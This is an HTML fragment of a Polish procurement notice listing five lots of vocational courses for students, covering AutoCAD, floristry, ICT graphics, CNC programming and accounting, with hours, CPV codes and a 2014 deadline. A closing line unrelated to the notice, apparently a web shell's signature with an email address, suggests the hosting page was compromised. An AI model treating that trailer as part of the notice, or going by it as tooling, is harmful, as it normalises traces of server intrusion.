<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs specjalistyczny z zakresu obsługi programu typu AutoCad.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs specjalistyczny z zakresu obsługi programu typu AutoCad obejmujący następujący zakres wiadomości i umiejętności: Zdobycie przez słuchacza wiedzy i umiejętności związanych z posługiwaniem się programem typu AutoCAD. Nabyciem umiejętności tworzenia rysunku technicznego, prawidłowego wymiarowania, kreskowania i wydruku. 
Kursem zostanie objętych 40 uczniów (4 grupy po 10 osób) w wymiarze 40 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem materiałów szkoleniowych ( podręczników- po jednym komplecie dla każdego uczestnika, trenerów). Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Specjalistyczny kurs zawodowy z florystyki  Malowaniem kwiatami.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie II- Specjalistyczny kurs zawodowy z florystyki  Malowaniem kwiatami obejmuje: zapoznanie uczestników kursu z zagadnieniami z zakresu florystyki i pozwala nabyć podstawowe umiejętności rozwijające zdolności kreatywne. Kurs powinien dotyczyć:
1) Historii dekoracji roślinnych
2) Materiału roślinnego
3) Poznania podstawowych technik w pracy florysty.
4) Nauki układania bukietów na różne okazje - środki techniczne i materiały dekoracyjne 
5) Bukietów okolicznościowych
6) Dekoracji florystycznej ślubu: stół kościół, samochody sala bankietowa....
7) Kompozycji kwiatowych w naczyniach 
8) Pielęgnacji roślin i kwiatów doniczkowych 
9) Sztuki kupowania
10) Sztuki sadzenia, podlewania, nawożenia
11) Nauki wyboru roślin ozdobnych w zależności od charakteru wnętrza
Kursem zostanie objętych 20 uczniów ( 2 grupy po 10 osób) w wymiarze 50 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem niezbędnych materiałów szkoleniowych gwarantujących efektywne przyswajanie wiedzy i nabywanie umiejętności. Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Specjalistyczny kurs zawodowy z wykorzystaniem ICT Techniki graficzne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Specjalistyczny kurs zawodowy z wykorzystaniem ICT Techniki graficzne obejmujący następujący zakres wiadomości: uczestnicy kursu nabędą umiejętności w zakresie obróbki zdjęć i tworzenia własnych projektów graficznych przy użyciu technologii informacyjnej.

Kursem zostanie objętych 20 uczniów ( 2 grupy po 10 osób) w wymiarze 40 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem niezbędnych materiałów szkoleniowych ( podręczników- po jednym komplecie dla każdego uczestnika), trenerów. Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs obsługi programowania obrabiarek sterowanych numerycznie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs obsługi programowania obrabiarek sterowanych numerycznie 
Program kursu w zakresie obsługi i programowania obrabiarek sterowanych numerycznie adresowany jest do uczniów uczących się zawody technik mechanik. Ma na celu przygotowanie uczestników szkolenia w zakresie: przestrzegania przepisów bhp i ppoż podczas obsługi maszyn i urządzeń, podstaw technologii skrawania, identyfikacji dokumentacji technicznej i technologicznej, wykorzystania specjalistycznego oprogramowania komputerowego CAD/CAM, przygotowania dokumentacji w programie CAD/CAM, projektowania procesu technologicznego oraz parametrów obróbki skrawaniem, programowania obrabiarek CNC, obsługi obrabiarek CNC, przenoszenie programów roboczych z komputera na maszyny.

Kursem zostanie objętych 20 uczniów ( 2 grupy po 10 osób) w wymiarze 40 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem materiałów szkoleniowych ( podręczników- po jednym komplecie dla każdego uczestnika, trenerów). Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu. Z uwagi na brak możliwości zorganizowania kursu w siedzibie Zamawiającego powinien on być zorganizowany przez Wykonawcę we własnej siedzibie lub w formie wyjazdowej: 5 wyjazdów po 8 godzin w dni wolne od zajęć lekcyjnych. Dla uczestników kursu wraz z opiekunem należy zapewnić transport do miejsca odbywania szkolenia, oraz catering. Catering powinien obejmować:
1.poczęstunek ( herbata, ciastka/ciasto, pączki)- serwowany podczas przerw między zajęciami
2.obiad składający się z dwóch dań ( zupa, drugie danie i kompot).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Specjalistyczny kurs zawodowy z przedsiębiorczości  Asystent rachunkowości- dobry zawód.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Specjalistyczny kurs zawodowy z przedsiębiorczości  Asystent rachunkowości- dobry zawód obejmujące następujący zakres wiadomości: gromadzenie, przeliczanie dokumentów i danych związanych z księgowością , finansami i obsługą kasy fiskalnej. 

Kursem zostanie objętych 20 uczniów ( 2 grupy po 10 osób) w wymiarze 60 godzin ( dydaktycznych = 45 min.) dla każdej z grup wraz z zapewnieniem materiałów szkoleniowych ( podręczników- po jednym komplecie dla każdego uczestnika, trenerów). Kurs powinien się zakończyć uzyskaniem przez każdego uczestnika certyfikatu z ukończonego kursu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com